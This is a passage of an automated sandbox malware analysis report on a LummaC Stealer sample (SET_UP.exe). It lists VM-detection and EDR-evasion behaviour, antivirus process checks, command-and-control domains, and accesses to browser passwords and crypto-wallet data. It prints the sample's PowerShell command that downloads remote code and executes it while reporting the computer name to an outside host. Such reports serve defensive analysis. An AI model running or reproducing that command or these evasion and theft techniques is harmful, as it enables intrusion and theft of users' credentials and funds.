            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\SET_UP.exeSystem information queried: FirmwareTableInformationJump to behavior
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BB37C44
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB3F3E1 second address: 6BB3F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB3F3FD second address: 6BB3F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F9A40AEBBE5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F9A40AEBC70h 0x00000031 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3066Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-K2ISP.tmp\_isetup\_isdecmp.dllJump to dropped file
            Source: C:\Users\user\Desktop\SET_UP.exeAPI coverage: 2.5 %
            Source: C:\Users\user\Desktop\SET_UP.exe TID: 7624Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 3066 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 235 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00498514 FindFirstFileW,GetDriveTypeW,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,0_2_00498514
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004B8FD2 FindFirstFileW,FindClose,0_2_004B8FD2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: SET_UP.exe, 00000000.00000003.2020979262.0000000000787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0k|%SystemRoot%\system32\mswsock.dll\
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SET_UP.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004B518C GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_004B518C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A16C4 SetUnhandledExceptionFilter,0_2_004A16C4
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A16D6 SetUnhandledExceptionFilter,0_2_004A16D6

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
            LummaC encrypted strings found
            Source: SET_UP.exeString found in binary or memory: rabidcowse.shop
            Source: SET_UP.exeString found in binary or memory: cloudewahsj.shop
            Source: SET_UP.exeString found in binary or memory: tirepublicerj.shop
            Source: SET_UP.exeString found in binary or memory: noisycuttej.shop
            Source: SET_UP.exeString found in binary or memory: cutefingeuker.click
            Source: SET_UP.exeString found in binary or memory: wholersorie.shop
            Source: SET_UP.exeString found in binary or memory: framekgirus.shop
            Source: SET_UP.exeString found in binary or memory: nearycrepso.shop
            Source: SET_UP.exeString found in binary or memory: abruptyopsn.shop
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENTJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; q{
            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; q{Jump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\19e52a1d VolumeInformation
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,36_2_00491486
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004A535D GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_004A535D
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004C5FE3 GetVersion,GetProcessVersion,LoadCursorW,LoadCursorW,LoadCursorW,0_2_004C5FE3
            Source: C:\Users\user\Desktop\SET_UP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: SET_UP.exe, 00000000.00000003.1959008841.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929935642.0000000003719000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2023039150.0000000003718000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7480, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: SET_UP.exe, 00000000.00000003.1909262053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: SET_UP.exe, 00000000.00000002.2021617890.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\Wh
            Source: SET_UP.exe, 00000000.00000003.1909606983.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: SET_UP.exe, 00000000.00000002.2021617890.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: SET_UP.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: SET_UP.exe, 00000000.00000003.1909606983.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
